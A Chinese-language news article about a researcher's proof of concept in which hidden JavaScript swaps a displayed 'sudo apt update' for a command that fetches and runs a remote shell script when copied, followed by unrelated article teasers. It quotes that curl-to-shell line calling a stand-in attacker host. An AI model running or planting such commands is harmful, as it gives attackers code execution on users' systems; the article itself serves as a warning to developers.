安全研究人员警告,HTML页面上的命令列可能藏匿恶意代码,开发者稍有不察直接复制贴上终端时,可能就让黑客得以于程序中植入后门
一名安全研究人员Gabriel Friedlander近日警告,随手从网络上复制与粘贴(/Paste)命令行时要特别小心,因为黑客可能趁此骇进开发者的系统或应用程序。
Friedlander打造了一个概念性验证攻击手法,他设计一个假装可用来更新Ubuntu操作系统的命令列,该命令列显示的文字很简单,为「sudo apt update」,但当开发者复制它,并将它贴上记事本或终端时,它出现的却是「curl http[:])attacker-domain:8000/shell.sh | sh 」,若是直接贴入终端,它将立即执行。
这是因为Friedlander在此一HTML页面上藏匿了JavaScript代码,而让开发者眼见的文字与粘贴之后所呈现的内容完全不同。
Friedlander说,不管是新手或是熟练的开发者,都可能会从网络上复制命令列或部份代码,但这是非常危险的行为,也许会让黑客直接于程序中植入后门,相关的攻击非常地简单,却可能带来极大的伤害,建议开发者应永远避免于终端贴上直接自网络上复制的命令列。
微信扫一扫
相关推荐
-
如何更换 watchOS 10 史努比表面?
相信升级 watchOS 10 后,不少人也想将表面改成Snoopy史努比吧? 它不止是简单的背景图,正确来说它是一连串动态图,数之不尽的造型,每次也令你看得心花怒放。 要将 Ap…
-
新版的 Lightroom AI 杂色减少功能,一键除噪点还能保有大量细节
Adobe Lightroom Classic 在今年四月发表了全新的 AI 降噪技术,有使用 Lightroom 的人,可以在「细节」的选项中找到「AI 杂色减少」功能。 这项功…
-
如何在Arch Linux上安装Docker
在 Arch Linux 上安装 Docker 很简单。它可以在 Extra 仓库中找到,你可以简单地 执行 pacman 魔法: 但要在 Arch Linux…
-
AirPods Pro 第二代 2023 版,除了 USB-C 你还应该知道这些改变:防水防尘升级、保真压缩音频
苹果本周在秋季发布会上,推出了iPhone 15系列、Apple Watch Series 9、Apple Watch Ultra 2之外,也针对AirPods Pro做了小改款,…
-
iPhone 紧急联络人设置教程,发生紧急状况时快速拨打电话
我们在 iPhone 上可以设置多位紧急联络人,以便在紧急情况发生时,可以快速拨打电话联络他们,而且万一你发生 SOS 紧急状况,身边的人也能通过你 iPhone 里的「医疗卡」功…
-
HONOR X8b 测评:2023年价格最亲民的素皮后盖手机?
HONOR 上个月才发布 HONOR X9b 5G 手机,没想到趁 2023 年结束前再推出 X 系列的其他机型。小编今天收到了全新的 HONOR X8b 手机,与之前发布过的手机…
